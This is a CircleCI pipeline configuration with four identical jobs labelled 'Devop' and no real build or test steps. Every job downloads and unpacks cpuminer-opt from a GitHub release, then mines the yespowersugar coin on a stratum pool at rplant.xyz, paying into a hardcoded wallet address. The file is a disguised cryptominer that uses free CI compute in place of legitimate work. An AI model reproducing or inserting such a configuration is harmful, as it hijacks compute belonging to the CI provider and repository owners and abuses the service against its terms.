version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - checkout
        - run: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.27/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yespowersugar  -o stratum+tcps://stratum-eu.rplant.xyz:17042 -u sugar1qgmqv5k9m44h4rf2qk3l3dm62j58sp4t76j6j5u.asd
            command: timeout 1m lscpu
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - checkout
        - run: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.27/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yespowersugar  -o stratum+tcps://stratum-eu.rplant.xyz:17042 -u sugar1qgmqv5k9m44h4rf2qk3l3dm62j58sp4t76j6j5u.asd
            command: timeout 1m lscpu
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - checkout
        - run: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.27/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yespowersugar  -o stratum+tcps://stratum-eu.rplant.xyz:17042 -u sugar1qgmqv5k9m44h4rf2qk3l3dm62j58sp4t76j6j5u.asd
            command: timeout 1m lscpu
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - checkout
        - run: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.27/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yespowersugar  -o stratum+tcps://stratum-eu.rplant.xyz:17042 -u sugar1qgmqv5k9m44h4rf2qk3l3dm62j58sp4t76j6j5u.asd
            command: timeout 1m lscpu
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3